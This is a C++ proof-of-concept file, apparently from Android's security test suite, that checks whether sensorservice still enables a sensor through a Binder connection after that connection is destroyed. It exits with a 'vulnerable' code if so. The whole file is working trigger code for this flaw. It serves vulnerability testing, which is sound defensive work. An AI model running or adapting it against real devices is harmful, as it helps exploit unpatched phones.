1 /**
2 * Copyright (C) 2020 The Android Open Source Project
3 *
4 * Licensed under the Apache License, Version 2.0 (the "License");
5 * you may not use this file except in compliance with the License.
6 * You may obtain a copy of the License at
7 *
8 * http://www.apache.org/licenses/LICENSE-2.0
9 *
10 * Unless required by applicable law or agreed to in writing, software
11 * distributed under the License is distributed on an "AS IS" BASIS,
12 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 * See the License for the specific language governing permissions and
14 * limitations under the License.
15 */
16 #include <binder/IPCThreadState.h>
17 #include <binder/IServiceManager.h>
18 #include <binder/Parcel.h>
19 #include <binder/ProcessState.h>
20 #include <sensor/Sensor.h>
21 #include <stdio.h>
22
23 #include "../includes/common.h"
24
25 using namespace android;
26
poc(int handle)27 void poc(int handle) {
28 status_t err;
29 sp<IServiceManager> sm = defaultServiceManager();
30 String16 name(String16("sensorservice"));
31 sp<IBinder> service = sm->getService(name);
32
33 if (service) {
34 Parcel data, reply;
35 data.writeInterfaceToken(service->getInterfaceDescriptor());
36 data.writeString8(String8("com.android.systemui.doze.DozeScreenBrightness"));
37 data.writeInt32(0 /*mode*/);
38 data.writeString16(String16("com.android.systemui"));
39 err = service->transact(2 /*CREATE_SENSOR_EVENT_CONNECTION*/, data, &reply, 0);
40 printf("CREATE_SENSOR_EVENT_CONNECTION err %08x \n", err);
41
42 sp<IBinder> binder = reply.readStrongBinder();
43
44 if (binder) {
45 {
46 Parcel data, reply;
47 data.writeInterfaceToken(binder->getInterfaceDescriptor());
48 data.writeInt32(handle); // handle
49 data.writeInt32(1); // enabled
50 data.writeInt64(0); // samplingPeriodNs
51 data.writeInt64(989680); // maxBatchReportLatencyNs
52 data.writeInt32(0); // reservedFlags
53 err = binder->transact(2 /*ENABLE_DISABLE*/, data, &reply, 0);
54 printf("ENABLE_DISABLE transact err %08x \n", err);
55 }
56
57 sleep(1);
58
59 {
60 Parcel data, reply;
61 String16 name = binder->getInterfaceDescriptor();
62 data.writeInterfaceToken(name);
63 err = binder->transact(6 /*DESTROY*/, data, &reply, 0);
64 printf("DESTROY transact err %08x \n", err);
65 }
66
67 {
68 Parcel data, reply;
69 data.writeInterfaceToken(binder->getInterfaceDescriptor());
70 data.writeInt32(handle); // handle
71 data.writeInt32(1); // enabled
72 data.writeInt64(0); // samplingPeriodNs
73 data.writeInt64(989680); // maxBatchReportLatencyNs
74 data.writeInt32(0); // reservedFlags
75 err = binder->transact(2 /*ENABLE_DISABLE*/, data, &reply, 0);
76 if (reply.readInt32() == OK) {
77 // Success in enabling a sensor after destroy leads to
78 // security vulnerability.
79 exit(EXIT_VULNERABLE);
80 }
81 printf("ENABLE_DISABLE transact err %08x\n", err);
82 }
83 } else {
84 printf("binder is null!\n");
85 sleep(3);
86 }
87 }
88 }
89
get_sensor_list()90 void get_sensor_list() {
91 sp<IServiceManager> sm = defaultServiceManager();
92 String16 name(String16("sensorservice"));
93 sp<IBinder> service = sm->getService(name);
94 if (service) {
95 Parcel data, reply;
96 data.writeInterfaceToken(String16("android.gui.SensorServer"));
97 data.writeString16(String16("opPackageName"));
98 service->transact(1 /*GET_SENSOR_LIST*/, data, &reply);
99
100 Sensor s;
101 Vector<Sensor> v;
102 uint32_t n = reply.readUint32();
103 v.setCapacity(n);
104 while (n > 0) {
105 n--;
106 reply.read(s);
107 v.add(s);
108 String8 nm = s.getName();
109 std::string nstr = nm.string();
110 String8 vd = s.getVendor();
111 std::string vstr = vd.string();
112 int32_t handle = s.getHandle();
113 printf("%s : %s, handle %d\n", nstr.c_str(), vstr.c_str(), handle);
114 poc(handle);
115 }
116 }
117 }
118
main(int,char **)119 int main(int /* argc */, char** /* argv */) {
120 get_sensor_list();
121 return 0;
122 }
123